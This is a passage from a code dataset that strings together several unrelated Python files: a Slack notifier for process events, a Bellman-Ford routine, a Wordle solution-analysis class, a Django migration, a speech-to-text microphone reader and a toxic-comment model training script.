from_state,\n self.EVENTS_SLACK_COLORS[eventname])\n }\n }\n ]\n }\n if self.webhook:\n webhook = WebhookClient(url=self.webhook, proxy=self.proxy)\n webhook.send_dict(body=payload)\n elif self.token:\n slack = WebClient(token=self.token, proxy=self.proxy)\n slack.chat_postMessage(**payload)\n\n def send_batch_notification(self):\n for msg in self.batchmsgs:\n hostname, processname, from_state, eventname = msg.rsplit(';')\n processname = processname.split(\":\")[0]\n if processname in self.process_whitelist or \"all\".lower() in [x.lower() for x in self.process_whitelist]:\n self.send_slack_notification(\n processname, hostname, eventname, from_state)\n elif processname in self.process_blacklist or \"all\".lower() in [x.lower() for x in self.process_blacklist]:\n return\n else:\n if eventname in self.process_filter_events:\n self.send_slack_notification(\n processname, hostname, eventname, from_state)\n\n\ndef main():\n superslacker = SuperSlacker.create_from_cmd_line()\n superslacker.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"slara/superslacker","sub_path":"superslacker/superslacker.py","file_name":"superslacker.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"72"} +{"seq_id":"22921298140","text":"def Bellman_Ford(G, s):\n d = {}\n parent = {}\n for i in G:\n d[i] = float('inf')\n d[s] = 0\n for i in range(len(G)):\n for u in G:\n for v in G[u]:\n if d[v] > d[u] + G[u][v]:\n d[v] = d[u] + G[u][v]\n parent[v] = u\n for u in G:\n for v in G[u]:\n if d[v] > d[u] + G[u][v]:\n print('negative weight cycle')\n return d\n","repo_name":"ensermuyigezu/Algorithms","sub_path":"Graph/bellman_ford.py","file_name":"bellman_ford.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14013871545","text":"import os\nimport time\nimport string\nimport pandas as pd\nfrom tqdm import tqdm\n\n\n\nclass WordleMe():\n\n def __init__(self):\n\n self.value_correct = '🟩'\n self.value_wrong_position = '🟨'\n self.value_incorrect = '⬛️'\n\n\n with open('solutions_20220215.txt', 'r') as f:\n block_of_text = f.read()\n no_quotes = block_of_text.replace('\"','')\n self.solutions_sequence = no_quotes.split(',')\n self.solutions = sorted(self.solutions_sequence)\n self.solutions = [w.upper() for w in self.solutions]\n # print(f'Number of solutions: {len(self.solutions)}')\n\n with open('herrings_20220215.txt', 'r') as f:\n block_of_text = f.read()\n no_quotes = block_of_text.replace('\"','')\n self.herrings = no_quotes.split(',')\n self.herrings = [w.upper() for w in self.herrings]\n # print(f'Number of herrings: {len(self.herrings)}')\n\n\n\n def save_word_beginnings(self):\n\n beginnings = []\n\n for word in self.solutions:\n beginnings += [word[:2]]\n\n dfb = pd.DataFrame(beginnings, columns=['beginnings'])\n counts_beginnings = pd.DataFrame(dfb.groupby('beginnings').size(), columns=['N'])\n counts_beginnings['percentage'] = counts_beginnings['N'] / counts_beginnings['N'].sum()\n counts_beginnings['first_letter'] = counts_beginnings.index.str[0]\n counts_beginnings['second_letter'] = counts_beginnings.index.str[1]\n\n print(f'Possible beginnings: {len(counts_beginnings)}')\n print(counts_beginnings.sort_values(by='N', ascending=False).head(20))\n counts_beginnings.sort_values(by='N', ascending=False).to_clipboard()\n\n print('')\n\n\n def save_word_endings(self):\n endings = []\n\n for word in self.solutions:\n endings += [word[-2:]]\n\n dfe = pd.DataFrame(endings, columns=['endings'])\n counts_endings = pd.DataFrame(dfe.groupby('endings').size(), columns=['N'])\n counts_endings['percentage'] = counts_endings['N'] / counts_endings['N'].sum()\n counts_endings['fourth_letter'] = counts_endings.index.str[0]\n counts_endings['fifth_letter'] = counts_endings.index.str[1]\n\n print(f'Possible endings: {len(counts_endings)}')\n print(counts_endings.sort_values(by='N', ascending=False).head(20))\n # counts_endings.sort_values(by='N', ascending=False).to_clipboard()\n\n\n def save_sorted_list(self):\n \"\"\"\n Write the solution list in alphabetical order to a new file\n \"\"\"\n\n with open('solutions_20220215_sorted.txt', 'w') as f:\n f.write('\\n'.join(sorted(self.solutions)))\n\n with open('herrings_20220215_sorted.txt', 'w') as f:\n f.write('\\n'.join(sorted(self.herrings)))\n\n def frequency(self):\n\n df = pd.DataFrame(columns=['words_containing_letter'], index=list(string.ascii_uppercase))\n\n for c in string.ascii_uppercase:\n\n letter_in_word = 0\n for w in self.solutions:\n if c in w:\n letter_in_word += 1\n\n df.loc[c, 'words_containing_letter'] = letter_in_word\n\n\n df['perc'] = df['words_containing_letter'] / len(self.solutions)\n\n df = df.sort_values(by='perc', ascending=False)\n # print(df)\n # df.to_csv('most_common_letters.csv')\n\n return df\n\n\n def solution_with_common_letters(self):\n \"\"\"\n Solutions that contain 'orate', the most common letters\n \"\"\"\n\n for idx, word in enumerate(self.solutions):\n # print(''.join(sorted(word)))\n\n if ''.join(sorted(word)) == 'aeors':\n print(word)\n\n\n\n def solution_stats(self):\n \"\"\"\n Solutions that contain a lot of common letters\n \"\"\"\n\n freq = self.frequency()\n scores = pd.DataFrame(\n index=self.solutions\n , columns=[\n 'letter_freq_score'\n , 'num_unique'\n , 'num_vowels'\n , 'letter_0'\n , 'letter_1'\n , 'letter_2'\n , 'letter_3'\n , 'letter_4'\n ]\n )\n\n scores.index.name = 'solution'\n\n for idx, word in enumerate(self.solutions):\n word_score = 0\n unique_letters = []\n vowels = []\n\n for letter in word:\n word_score += freq.loc[letter, 'perc']\n\n if letter not in unique_letters:\n unique_letters += [letter]\n\n if letter in ['A', 'E', 'I', 'O', 'U']:\n vowels += [letter]\n\n # print(word)\n # print(unique_letters)\n # print()\n\n scores.loc[word, 'letter_freq_score'] = word_score\n scores.loc[word, 'num_unique'] = len(unique_letters)\n scores.loc[word, 'num_vowels'] = len(vowels)\n\n for position, letter in enumerate(word):\n scores.loc[word, f'letter_{position}'] = letter\n\n for character in string.ascii_uppercase:\n scores.loc[word, f'has_{character}'] = character in word\n\n for character in string.ascii_uppercase:\n scores.loc[word, f'count_{character}'] = self.count_letter_occurances_in_word(word, character)\n\n # print(scores[scores['num_unique'] == 5].sort_values(by='letter_freq_score', ascending=False).head(20))\n # print(scores[(scores['num_unique'] == 5) & (scores['num_vowels'] == 1)].sort_values(by='letter_freq_score', ascending=False).head(20))\n\n scores['difficulty_percentile'] = scores['letter_freq_score'].rank(pct=True, ascending=False)\n # print(scores.sort_values(by='letter_freq_score'))\n # print(scores.loc['ultra'])\n # scores.to_clipboard()\n\n unique_stats = pd.DataFrame(scores.groupby('num_unique').size(), columns=['N'])\n unique_stats['perc'] = unique_stats['N'] / unique_stats['N'].sum()\n print(unique_stats)\n\n scores.to_csv('scores.csv')\n\n\n\n def count_letter_occurances_in_word(self, word, letter):\n \"\"\"Return the number of times that 'letter' appears in the 'word' \"\"\"\n\n count_occurances = 0\n\n for j in range(5):\n if word[j] == letter:\n count_occurances += 1\n\n return count_occurances\n\n\n\n def difficulty_by_day(self):\n \"\"\"\n How difficult is every word?\n\n ulcer = 2022-02-11\n \"\"\"\n\n word_rank = pd.DataFrame(index=self.solutions, columns=['letter_freq_score', 'rank', 'percentile'])\n \n for word in enumerate(self.solutions):\n\n word_rank.loc[word, 'letter_freq_score'] = 1\n\n\n\n def corpus_frequency(self):\n\n word_frequency = pd.read_excel('wordFrequency.xlsx', sheet_name='3 wordForms')\n\n in_word_list = 0\n for word in self.solutions:\n if word in word_frequency['word'].tolist():\n in_word_list += 1\n\n print(in_word_list / len(self.solutions))\n\n\n\n def previous_in_sequence(self):\n \"\"\"\n Is the sequence still the same? Check without spoiling an answer by revealing the answer from yesterday\n \"\"\"\n\n todays_solution = 'aroma'\n yesterdays_solution = self.solutions_sequence[self.solutions_sequence.index(todays_solution) - 1]\n print(f'yesterdays_solution: {yesterdays_solution}')\n\n\n\n def compare_two_lists(self, list_left, list_right):\n \n in_left_but_not_right = []\n\n for word in list_left:\n if word not in list_right:\n in_left_but_not_right += [word]\n\n print(f'in_left_but_not_right: {in_left_but_not_right} ({len(in_left_but_not_right)} words)')\n\n\n in_right_but_not_left = []\n\n for word in list_right:\n if word not in list_left:\n in_right_but_not_left += [word]\n\n print(f'in_right_but_not_left: {in_right_but_not_left} ({len(in_right_but_not_left)} words)')\n\n\n\n def compare_lists_to_current(self, comparison_date='20220215'):\n \"\"\"\n Compare a set of Wordle lists to \n \"\"\"\n\n with open(f'solutions_{comparison_date}.txt', 'r') as f:\n block_of_text = f.read()\n no_quotes = block_of_text.replace('\"','')\n solutions_sequence = no_quotes.split(',')\n solutions_sequence = [w.upper() for w in solutions_sequence]\n solutions_comparison = sorted(solutions_sequence)\n\n with open(f'herrings_{comparison_date}.txt', 'r') as f:\n block_of_text = f.read()\n no_quotes = block_of_text.replace('\"','')\n herrings_comparison = no_quotes.split(',')\n herrings_comparison = [w.upper() for w in herrings_comparison]\n\n print('\\nSolution changes:')\n self.compare_two_lists(solutions_comparison, self.solutions)\n print('\\nHerring changes:')\n self.compare_two_lists(herrings_comparison, self.herrings)\n print()\n\n\n\n def guess_analysis(self, guesses, solution=None, debug=False, terminal_format=True):\n \"\"\"\n For a list of guesses, show how well each guess performed at limiting the field of possible solutions.\n\n solution= the word that is the solution to the puzzle. If not given, assume the last guess is the solution\n \"\"\"\n\n print('\\n\\n\\n~~~~~ ~~~~~ Wordle Guess Analysis ~~~~~ ~~~~~')\n\n if not solution:\n solution = guesses[-1]\n\n solution = solution.upper()\n guesses = [g.upper() for g in guesses]\n\n psdf = pd.read_csv('scores.csv')\n psdf['possible'] = 1\n \n for guess_num, g in enumerate(guesses):\n print(f'\\nGuess {guess_num+1}: {g}')\n\n response = self.process_guess(solution, g)\n print(' ', end='')\n self.print_emoji(response)\n self.is_guess_playable(g)\n\n # self.is_guess_on_list(g)\n\n psdf, _ = self.eliminate_solutions(psdf, solution, g, verbose_es=True, debug=debug, terminal_format=terminal_format)\n\n\n\n def process_guess(self, solution, guess):\n \"\"\"\n Guess at a solution. Return green, yellow, or gray\n \"\"\"\n\n response = [self.value_incorrect] * 5\n\n unmatched_letters_in_solution = []\n\n for position, letter in enumerate(guess):\n if solution[position] == letter:\n response[position] = self.value_correct\n else:\n unmatched_letters_in_solution += [solution[position]]\n\n for position, letter in enumerate(guess):\n if response[position] == self.value_correct:\n continue\n elif letter in unmatched_letters_in_solution:\n response[position] = self.value_wrong_position\n \n return response\n\n\n\n def is_guess_playable(self, guess):\n \"\"\"\n Raise an exception if the guess is not on the lists of playable words\n \"\"\"\n\n if (guess not in self.solutions) and (guess not in self.herrings):\n raise Exception(f'\"{guess}\" is not a playable word.')\n\n\n\n def is_guess_on_list(self, guess):\n \"\"\"\n Print information about which list the guess is on.\n \"\"\"\n\n if (guess not in self.solutions) and (guess in self.herrings):\n print(f'\"{guess}\" is a playable word but not on the list of solutions, so it\\'s not an optimal guess.')\n\n elif guess in self.solutions:\n print(f'\"{guess}\" is on the list of solutions.')\n\n\n\n def print_emoji(self, emoji_sequence):\n \"\"\"\n Print the response emoji sequence to the terminal.\n \"\"\"\n\n for e in emoji_sequence:\n print(e, end='')\n\n print()\n\n\n\n def print_word_list(self, word_list, solution=None, max_chars_per_line=80, highlight_solution=False):\n \"\"\"\n Print a list of words in a pretty block\n \"\"\"\n\n chars_used = 0\n\n for idx, word in enumerate(word_list):\n\n if highlight_solution:\n\n if word == solution:\n print('>>>' + word + '<<<', end=' ')\n chars_used += len(word) + 6\n else:\n print(word, end=' ')\n chars_used += len(word) + 1\n\n\n print(word, end=' ')\n chars_used += len(word) + 1\n\n if chars_used >= max_chars_per_line:\n print()\n chars_used = 0\n\n\n print()\n\n\n\n def eliminate_solutions(self, psdf, solution, guess, verbose_es=False, debug=False, terminal_format=True):\n \"\"\"\n Show how many possible solutions this guess has eliminated\n \"\"\"\n\n before_guess_list = psdf[psdf['possible'] == 1]['solution'].tolist()\n before_guess_count = len(before_guess_list)\n\n if verbose_es:\n if guess != solution:\n if guess in before_guess_list:\n print(f'\"{guess}\" is on the list of possible solutions at the start of this round, well played!')\n else:\n print(f'\"{guess}\" is not on the list of possible solutions at the start of this round, so it\\'s not an optimal guess.')\n\n if guess in self.herrings:\n print(f'Additionally, \"{guess}\" will never be a solution, though it is a playable word.')\n\n response = self.process_guess(solution, guess)\n\n for position, status in enumerate(response):\n\n letter = guess[position]\n\n if status == self.value_correct:\n psdf.loc[psdf[f'letter_{position}'] != letter, 'possible'] = 0\n\n if debug:\n print(f'position {position}, guess \"{letter}\", value_correct')\n self.print_word_list(psdf[psdf['possible'] == 1]['solution'].tolist())\n\n elif status == self.value_wrong_position:\n psdf.loc[(psdf[f'has_{letter}'] == False) | (psdf[f'letter_{position}'] == letter), 'possible'] = 0\n\n if debug:\n print(f'position {position}, guess \"{letter}\", value_wrong_position')\n self.print_word_list(psdf[psdf['possible'] == 1]['solution'].tolist())\n\n elif status == self.value_incorrect:\n # This letter cannot be in the guessed position\n psdf.loc[psdf[f'letter_{position}'] == letter, 'possible'] = 0\n\n # Also loop through each position in the response. \n # If the value isn't green, then this incorrect letter cannot be in that position. \n # If the value is green, then it is possible for this incorrect letter to be in that position.\n\n for j in range(5):\n if response[j] != self.value_correct:\n psdf.loc[psdf[f'letter_{j}'] == letter, 'possible'] = 0\n\n if debug:\n print(f'position {position}, guess \"{letter}\", value_incorrect')\n self.print_word_list(psdf[psdf['possible'] == 1]['solution'].tolist())\n\n after_guess_count = psdf['possible'].sum()\n\n if after_guess_count == 0:\n raise Exception('No possible solutions remain. Something went wrong in the word elimination logic.')\n\n eliminated = before_guess_count - after_guess_count\n elim_perc = eliminated / before_guess_count\n\n if verbose_es:\n\n # If the guess is the solution AND the only possibility at this guess, skip this message\n if not (guess == solution and before_guess_count == 1):\n plural = 's' if before_guess_count > 1 else ''\n print(f'Guess \"{guess}\" eliminated {eliminated} of {before_guess_count} solution{plural} ({elim_perc:.1%})')\n\n if guess == solution:\n print(f'\"{guess}\" is correct!')\n else:\n noun = 's' if after_guess_count > 1 else ''\n verb = '' if after_guess_count > 1 else 's'\n print(f'{after_guess_count} solution{noun} remain{verb}: ')\n\n if terminal_format:\n max_chars_per_line=80\n else:\n max_chars_per_line=10000\n\n self.print_word_list(psdf[psdf['possible'] == 1]['solution'].tolist(), solution, max_chars_per_line=max_chars_per_line)\n\n return psdf, elim_perc\n\n\n\n def analyze_opening_guesses(self):\n \"\"\"\n Cycle through all opening guesses to see which consistently eliminate the most solutions\n\n Save output to CSV on each cycle for safety because this function takes like 8 hours to complete\n\n Each row is one possible solution\n Each column is a possible opening\n \"\"\"\n\n # Create the output DataFrame if it doesn't already exist\n output_filename = 'opening_df.csv'\n\n if os.path.exists(output_filename):\n opening_df = pd.read_csv(output_filename, index_col='solution')\n else:\n opening_df = pd.DataFrame(index=self.solutions, columns=self.solutions)\n opening_df.index.name = 'solution'\n opening_df.columns.name = 'opening'\n\n\n psdf_static = pd.read_csv('scores.csv')\n psdf_static['possible'] = 1\n\n # Find solutions in the DataFrame that have not yet had openings tested against them\n words_tested = opening_df[self.solutions].notnull().sum(axis=1)\n words_remaining = words_tested[words_tested == 0].index.tolist()\n\n for idx, solution in enumerate(words_remaining):\n\n print(f'Testing best opening word for: {solution}')\n\n opening_elim_row = self.one_guess_all_solutions(solution, verbose_ogas=False, subset_only=False).transpose().values\n opening_df.loc[solution, :] = opening_elim_row[0]\n\n opening_df.to_csv(output_filename)\n # opening_df.to_csv(output_filename, index_label='solution')\n\n # if idx % 50 == 0:\n # print('Sleeping for 3 minutes...')\n # time.sleep(180)\n\n if idx > 3:\n break\n\n print('Opening guess dataset complete.')\n\n\n\n def one_guess_all_solutions(self, guess, verbose_ogas=False, subset_only=False):\n \"\"\"\n Run one opening guess through all the possible solutions as an opening word\n \"\"\"\n\n psdf = pd.read_csv('scores.csv')\n psdf['possible'] = 1\n guess_elim_perc = pd.DataFrame(index=self.solutions, columns=[guess])\n\n if verbose_ogas:\n iterator = tqdm(self.solutions)\n else:\n iterator = self.solutions\n\n for idx, solution in enumerate(iterator):\n\n if subset_only and idx > 10:\n break\n\n # Ignore situations where the guess is perfect\n if guess == solution:\n continue\n\n _, elim_perc = wm.eliminate_solutions(psdf.copy(), solution, guess, verbose_es=False)\n guess_elim_perc.loc[solution, guess] = elim_perc\n\n if verbose_ogas: \n print(f'On average, guess \"{guess}\" eliminates {guess_elim_perc[guess].mean():.1%} of solutions when played as the first guess.')\n\n # todo: make a histogram\n\n return guess_elim_perc\n\n\n\n def best_opening_word(self):\n\n df = pd.read_csv('opening_df_complete.csv', index_col='solution')\n\n openings_median = df[self.solutions].median(numeric_only=True, axis=0)\n openings_median.name = 'elim_perc_median'\n openings_mean = df[self.solutions].mean(numeric_only=True, axis=0)\n openings_mean.name = 'elim_perc_mean'\n\n openings_stats = pd.merge(openings_median, openings_mean, how='inner', left_index=True, right_index=True)\n openings_stats['elim_perc_median_rank'] = openings_stats['elim_perc_median'].rank(ascending=False)\n openings_stats['elim_perc_mean_rank'] = openings_stats['elim_perc_mean'].rank(ascending=False)\n \n openings_stats['elim_more_than_50'] = (df[self.solutions] > 0.5).sum(axis=0) / len(df)\n openings_stats['elim_more_than_50_rank'] = openings_stats['elim_more_than_50'].rank(ascending=False)\n \n openings_stats.index.name = 'guess'\n output_columns = [\n 'elim_perc_mean'\n , 'elim_perc_mean_rank'\n , 'elim_perc_median'\n , 'elim_perc_median_rank'\n , 'elim_more_than_50'\n , 'elim_more_than_50_rank'\n ]\n openings_stats[output_columns].sort_values(by=['elim_more_than_50_rank', 'elim_perc_mean_rank']).to_csv('opening_stats.csv')\n print('Stats saved to: opening_stats.csv')\n\n # print(sum(df['RAISE'] < 0.6))\n\n\n\n def share_four_letters(self):\n \"\"\"\n Identify groups of solutions that share 4 letters with each other\n\n This is working well for first and last. But how to handle clusters like SMELT and SPELT?\n \"\"\"\n\n psdf = pd.read_csv('scores.csv', index_col='solution')\n psdf['match_first_four'] = None\n psdf['match_first_four_count'] = None\n psdf['match_last_four'] = None\n psdf['match_last_four_count'] = None\n\n for solution in tqdm(self.solutions):\n match_first_four = [solution]\n match_last_four = [solution]\n \n for comparison in self.solutions:\n\n if comparison == solution:\n continue\n\n if solution[:4] == comparison[:4]:\n match_first_four += [comparison]\n\n if solution[-4:] == comparison[-4:]:\n match_last_four += [comparison]\n\n psdf.loc[solution, 'match_first_four'] = ', '.join(sorted(match_first_four))\n psdf.loc[solution, 'match_first_four_count'] = len(match_first_four)\n psdf.loc[solution, 'match_last_four'] = ', '.join(sorted(match_last_four))\n psdf.loc[solution, 'match_last_four_count'] = len(match_last_four)\n\n psdf[['match_first_four', 'match_first_four_count', 'match_last_four', 'match_last_four_count']].to_csv('share_four_letters.csv')\n\n\n\n def cluster_four_letters(self):\n\n psdf = pd.read_csv('scores.csv', index_col='solution')\n\n cluster_long = pd.DataFrame(columns=['cluster', 'word'])\n\n for solution in tqdm(self.solutions):\n\n for comparison in self.solutions:\n\n if comparison == solution:\n continue\n\n letters_shared = 0\n shared_list = ['_'] * 5\n\n for i in range(5):\n if solution[i] == comparison[i]:\n letters_shared += 1\n shared_list[i] = solution[i]\n\n if letters_shared == 4:\n\n shared_word = ''.join(shared_list)\n new_row = {'cluster': shared_word, 'word': comparison}\n cluster_long = cluster_long.append(new_row, ignore_index=True)\n\n # if len(cluster_long) > 20:\n # break\n\n cluster_long = cluster_long.sort_values(by='word').drop_duplicates()\n cluster_wide = cluster_long.groupby('cluster').agg(\n num_words=('cluster', 'size')\n , solution_list=('word', ', '.join)\n )\n print(cluster_wide.sort_values(by='num_words', ascending=False))\n # cluster_wide.to_csv('share_four_letters.csv')\n\n\n\n\n\nif __name__ == '__main__':\n\n wm = WordleMe()\n\n # wm.solution_with_common_letters()\n # wm.frequency()\n\n # wm.solution_stats()\n \n # wm.corpus_frequency()\n\n # wm.previous_in_sequence()\n\n # wm.compare_lists_to_current()\n\n # wm.save_sorted_list()\n\n # wm.guess_analysis(['arise', 'white', 'glide', 'olive']) # Devin 2022-04-23\n\n\n\n # wm.analyze_opening_guesses()\n wm.best_opening_word()\n\n\n # wm.one_guess_all_solutions('RAISE', verbose_ogas=True)\n # wm.one_guess_all_solutions('NOISE', verbose_ogas=True)\n # wm.one_guess_all_solutions('CABLE', verbose_ogas=True)\n\n # wm.share_four_letters()\n # wm.cluster_four_letters()\n\n \n\n # todo: histogram of positions of letters\n # todo: maybe a difficulty score of each solution based on the percentage of solutions eliminated\n # from each opening guess. like, opposite axis mean of the best opening word\n\n\n","repo_name":"devinbrady/wordle-analysis","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":24274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"75020933031","text":"'''PSCP Program'''\ndef main(row, col):\n '''8390-ScaledMatrix 30/10/2022'''\n mat, norm, count = [float(input()) for _ in range(row*col)], [], 0\n mat_stats = max(mat), min(mat)\n for i in mat:\n norm.append((i-mat_stats[1])/(mat_stats[0]-mat_stats[1]))\n for _ in range(row):\n for _ in range(col):\n print('%.2f' % norm[count], end=' ')\n count += 1\n print()\nmain(int(input()), int(input()))\n","repo_name":"Maldin0/Python","sub_path":"213-ScaledMatrix.py","file_name":"213-ScaledMatrix.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30517452130","text":"import networkx as nx\nimport random \n\ndef remove_node(subgraph,n_nodes=1):\n mapping = {node:node for i, node in enumerate(subgraph.nodes())}\n subG = nx.relabel_nodes(subgraph,mapping)\n nodes=[]\n prob=[]\n for node in subG.nodes():\n nodes.append(node)\n prob.append(subG.degree(node))\n \n removed_node = random.sample(nodes, min(n_nodes,len(nodes)))\n subG.remove_nodes_from(removed_node)\n\n return subG \n\ndef remove_edge(subgraph,n_edges=1):\n mapping = {node:node for i, node in enumerate(subgraph.nodes())}\n subG = nx.relabel_nodes(subgraph,mapping)\n removed_edges= [edge for edge in subG.edges()]\n removed_edge = random.sample(removed_edges, min(n_edges, len(removed_edges)))\n subG.remove_edges_from(removed_edge)\n return subG \n\ndef add_node(subgraph,n_edges=1):\n\n return subgraph \n\ndef add_edge(subgraph,n_edges=1):\n mapping= {node:node for i, node in enumerate(subgraph.nodes())}\n subG = nx.relabel_nodes(subgraph,mapping)\n added_edges = []\n for i in subG.nodes():\n for j in subG.nodes():\n if i==j or (i,j) in subG.edges(): continue\n added_edges.append((i,j))\n added_edge = random.choice(added_edges)\n subG.add_edges_from([added_edge])\n return subG ","repo_name":"graphretrieval/ESSIso","sub_path":"generate_data/utils/corrupt_graph.py","file_name":"corrupt_graph.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"71784306152","text":"'''\n다시보기\n'''\ndef countMakingCointCase(p):\n coins = [25, 10, 5, 1]\n dp = [[-1]*(p+1) for i in range(4)]\n\n def dfs(index, price):\n if price == 0:\n return 1\n\n if index > 3:\n return 0\n if price < 0:\n return 0\n\n if dp[index][price] != -1:\n return dp[index][price]\n\n ret = 0\n while price >= 0:\n ret += dfs(index+1, price)\n price = price - coins[index]\n dp[index][price] = ret\n return ret\n\n return dfs(0, p)\n\nprint(countMakingCointCase(100))\nprint(sorted('hellow'))\n\n","repo_name":"yhancsx/algorithm-weekly","sub_path":"cracking_the_coding_interview/8.11.py","file_name":"8.11.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"18287590394","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(default=b'No title', max_length=50)),\n ('photo', models.ImageField(upload_to=b'photos/')),\n ('pub_date', models.DateField(auto_now_add=True)),\n ('favorite', models.BooleanField(default=False)),\n ('comment', models.CharField(max_length=200, blank=True)),\n ('category', models.ForeignKey(blank=True, to='album.Category', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"cristianjs19/viaje-blog","sub_path":"album/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42704241577","text":"import speech_recognition as sr\nfrom src.reader import Reader\n\n\nclass MicrophoneReader(Reader):\n \"\"\"A class based on the speech recognition package to listen to audio continuously via microphone inputs.\"\"\"\n\n RECORD = {\n \"en-US\": \"Say something!\",\n \"fa-IR\": \"چیزی بگو!\"\n }\n\n def __init__(self, *args, **kwargs):\n super(MicrophoneReader, self).__init__(*args, **kwargs)\n\n def read(self):\n self.adjust_amb_noise(self.language)\n audio = self.record(self.language)\n return self.recognize_google(audio, self.language)\n\n def adjust_amb_noise(self, language):\n self._print(self.ADJUST_AMB_NOISE.get(language, ''), self.verbose, self.safe_rtl)\n\n with sr.Microphone() as source:\n self.r.adjust_for_ambient_noise(source)\n\n self._print(self.ENERGY_THRESHOLD.get(language, '').format(\n self.r.energy_threshold), self.verbose, self.safe_rtl)\n return self\n\n def record(self, language):\n with sr.Microphone() as source:\n self._print(self.RECORD.get(language, ''),\n self.verbose, self.safe_rtl)\n return self.r.listen(source)\n","repo_name":"hooshvare/speech2text","sub_path":"src/mic.py","file_name":"mic.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"6070175299","text":"import os\nimport time\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import ShuffleSplit\n\nimport toxic_model.config as config\nfrom toxic_model.models import train_model\nfrom toxic_model.preprocessing import prepare_data, get_embedding_matrix\nfrom toxic_model.utils import load_pickle, create_pickle, create_json, custom_multi_label_skfold, create_submission_file\n\n# preprocessing comment config\npreprocess_para = {\n \"max_seq_len\": 100,\n \"max_nb_words\": 200000,\n \"remove_apostrophe\": True,\n \"remove_stopwords\": False,\n \"stemming\": False,\n \"lemmatization\": False,\n \"alpha_numeric\": False\n}\n\n# model hyperparameters\nmodel_para = {\n 'input_seq_len': preprocess_para['max_seq_len'], # input sequence length\n 'spatial_dropout': 0.2, # spatial dropout after embedding layer\n 'num_rnn_layers': 1, # number of lstm and gru layers\n 'rnn_layer_type': 'gru', # gru / lstm layer\n 'num_rnn_units': [80], # hidden units for lstm / gru\n 'dropout_concat': 0.2, # dropout before dense layer\n 'num_units_dense1': 100, # hidden units dense layer\n 'dropout_dense1': 0.2, # dropout after dense layer\n 'num_output': 6 # number of output labels\n}\n\n# training configurations\ntraining_para = {\n 'batch_size': 256,\n 'max_epoch': 50,\n 'shuffle': True,\n 'ensemble_kfold': True, # True for stratified KFold ensembling\n 'stratified_kfold': 10, # number of Folds\n 'validation_spit': 0.1, # will not be used in case of ensemble KFOLD,\n # floor value of inverse will be used as number of folds\n 'embedding_type': 'fasttext_wiki', # 'glove_840B', 'glove_twitter', 'fasttext_wiki', 'fasttext_crawl'\n 'embedding_size': 300,\n 'tensorboard_callback': True\n}\n\n\ndef prepare_and_train(train_count, configs):\n \"\"\"\n function for preparing data, training model, test submissions predictions\n :param train_count: train iteration useful for keeping track for different versions\n :param configs: (preprocess_config, training_config, model_para)\n :return: None\n \"\"\"\n\n preprocess_config, training_config, model_config = configs\n\n # creating iteration directory if doesn't exist\n if not os.path.exists(config.OUTPUT_DIR.format(train_count)):\n os.mkdir(config.OUTPUT_DIR.format(train_count))\n\n # Preprocessing data and create pickle if doesn't exist\n if os.path.exists(config.DATA_PKL.format(train_count)):\n data_dict = load_pickle(config.DATA_PKL.format(train_count))\n else:\n data_dict = prepare_data(config.TRAIN_CSV, config.TEST_CSV, preprocess_config)\n # creating word embedding matrix from word_index dictionary\n data_dict['word_embedding_matrix'] = get_embedding_matrix(training_config['embedding_type'],\n training_config['embedding_size'],\n data_dict['word_index'])\n create_pickle(data_dict, config.DATA_PKL.format(train_count))\n\n # custom Stratified KFold for ensembling\n if training_config['ensemble_kfold']:\n train_val_split = custom_multi_label_skfold(data_dict['train_labels'],\n training_config['stratified_kfold'])\n else:\n # shuffle split for creating train and val split, if not doing ensembling\n shuffle_split = ShuffleSplit(n_splits=1,\n test_size=training_config['validation_spit'])\n train_val_split = shuffle_split.split(data_dict['train_labels'])\n\n test_results = []\n fold_count = 0\n for train_index, val_index in train_val_split:\n # getting train and validation data\n train_data = (data_dict['train_seq'][train_index], data_dict['train_labels'][train_index],\n data_dict['train_seq'][val_index], data_dict['train_labels'][val_index])\n\n # training model\n model = train_model(train_count, (training_config, model_config), train_data, fold_count,\n data_dict['word_embedding_matrix'])\n\n # predicting on train data and ROC score calculation\n train_predict = model.predict(data_dict['train_seq'])\n train_roc_score = roc_auc_score(data_dict['train_labels'][train_index], train_predict[train_index])\n val_roc_score = roc_auc_score(data_dict['train_labels'][val_index], train_predict[val_index])\n print(\"train roc score\", train_roc_score)\n print(\"validation roc score\", val_roc_score)\n\n # predicting on test data\n test_results.append(model.predict(data_dict['test_seq']))\n fold_count += 1\n\n # average ensembling for number for folds\n test_output = np.sum(np.asarray(test_results), axis=0)/fold_count\n\n # save predictions for submission\n create_submission_file(test_output, config.TEST_SUBMISSION_FILE.format(train_count))\n\n # save config data in 